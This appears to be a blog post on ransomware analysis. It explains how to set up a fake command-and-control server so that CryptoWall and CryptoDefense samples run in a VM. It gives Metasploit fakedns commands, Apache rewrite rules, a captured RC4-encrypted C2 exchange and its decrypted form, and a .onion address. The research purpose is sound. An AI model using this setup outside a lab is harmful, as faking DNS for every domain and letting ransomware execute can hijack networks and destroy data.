In this article i'm going to describe a way to create a fake C&C for CryptoWall and CryptoDefense families, and how to get samples of these families working into a vmware for example.
In the first place, we need to redirect any connection performed by the ransomware to our server. Depending on the sample they connect to different domains, so we need to redirect any connection to our fake server.
We will use metasploit's fakedns module for this purpose:
msf > use auxiliary/server/fakedns
msf auxiliary(fakedns) > set TARGETACTION FAKE
TARGETACTION => FAKE
msf auxiliary(fakedns) > set TARGETDOMAIN *
TARGETDOMAIN => *
msf auxiliary(fakedns) > set TARGETHOST 192.168.2.2
TARGETHOST => 192.168.2.2
With these commands we create a dns server that redirect any query to 192.168.2.2. On this ip address will be running an apache server.
In the second place we need to redirect any query to our http server (any URI) to the same document. We can do this by adding these lines to httpd.conf:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index.php
RewriteRule . /index.php
Now we can implement the php to give to the ransomware the responses that they need to work.
CryptoWall
Example query:
8 0.218529 192.168.204.235 141.255.167.3 HTTP 156 POST /w72sh29mlo HTTP/1.1 (application/x-www-form-urlencoded) w=c13314ada7ed648b9919aeff2306e02241242601e0744aa69304d98065c43670fca844aa579d9ab44f3c1bd89231b9351c34 Here we can see a complete communcation extracted from a pcap file: Q:nvawc5uxnp,3de9a8c4e00c59e80a58059f17cdab179e740ac0337b673dd50e7499b43ea13c1c37d8def042e12d520b49da59650016c9 R:nvawc5uxnp,3deae595eb0f14 Q:ylrq5msbpctg,30c51f5e25a1f0346aa429e82c9db310dbdc13c8a8d11f93e3b8a734aeb90a295f4a01219bf164ce59b57591 Q:ylrq5msbpctg,30c0560d2ef8b0657faa69cf1d92ea5deef13993efcc41c4c9e5f87fafcd2928153c626f87ef7fa1328b04ab311a01913e75e057b68ae9b29ea70410f7f71316edb6b2490d19467c2b699e43abfefac5aa7028cb2e5ecfd8428a82820e85155cff3a94c56f7a7cc722189888237d65eb112674486631a0280a85412f722220cb83982c940230ccc35afee0c27cf7fd471cab5ed1ccd950f6cfdd5f44bde319421ec7ead45d9fb7d1163e15637874298a6ede97bc0cc3348463784b46c40fc26686e74e2522e66365b8e064a84b013601b081a7ee9ff68a2cfec79adfcb14e6080a52faf8aa98fad6a6192d8d19d2804707d697ee42ae9b12e844ba73e7844d95849997cb5c7fbfb0f58a4915e831d12b8d02512c39c575667b2e7bf4163e8858a026f783d5b0fa50a3d38bb5b8bbb66d45d8be2b45b3e422df25a8d18aec70aba9212748488f914df06a08f6666a551169898e95eed5b4b82a11fe7aea2e32e02774e6ed0b0df879156079d26e74fb6605989fdd4731a20c4d53bb5da13b04a936d20a8d91088e6e5a19e6eb0c13d49e46b26a8ed3dfd2a9331142a3fc1c08636f997bf5caedd9dc095a93b63810527541f78d33bb775955292277d2ae621fb95dc88e1bdc59f9e6c44caea922c327c6bbc2cb78831387f0bab6e58b8eb73392167c0c4085070f86fdeb2ada0cb966 |
The string before comma is the rc4 key. The string after comma is the POST data.
We can decrypt it with the script in the section Code 1 at the end of this article.
The decrypted queries/responses:
query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1} query:{7|cw200|99DC835DFC77319C2176AB46302136BF|4} response:{250|kpai7ycr7jxqkilp.onion|75a5|ES|-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq6ZEGywe2wC83CErmVhB gn89wi2lq8rQyYZZGCUyQr5cQirN32HX5n6MNcJDjB8uINSosaHHGdCPUeOoetx9 IM3TiXZwwSnteGR+gBry/C7dr3JSAWrnLE+TkeO6mrQ8yUtaZ3ue7XSyvV457jLz Lg1noHcLL/RXNKsP0MmbZW1yHvRulsuy5XW6clQqNMMmfAAT8y+UwePL7M0YG86q SP9QQFB3B+FdlRJ/8VlN3Sva1JeXJbxGcbmowwtJEJVZtAuf9c7sDv5Kt1tlH8Z2 VXjg4P2Dw3KUg/7pcfL18SAEfsRBIONFvLNcrVdh0/W5aVh6/9djcnMiCV61CYkS 7wIDAQAB -----END PUBLIC KEY-----} |
We only need to imitate the communication with our php to get cryptowall working.
You can find a functional php file in the section Code 2 at the end of this article.
CryptoDefense
CryptoDefense communications are very similar to CryptoWall. It uses the same mechanism of query/response encrypted with rc4. We can use the same python script to decrypt communications. Here is a sample decrypted communication:
query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}
With CryptoDefense we only need to response with a "OK" response to the client and it starts to encrypt.
The php file in the section Code 2 at the end of this article works for CryptoWall and CryptoDefense.
No comments:
Post a Comment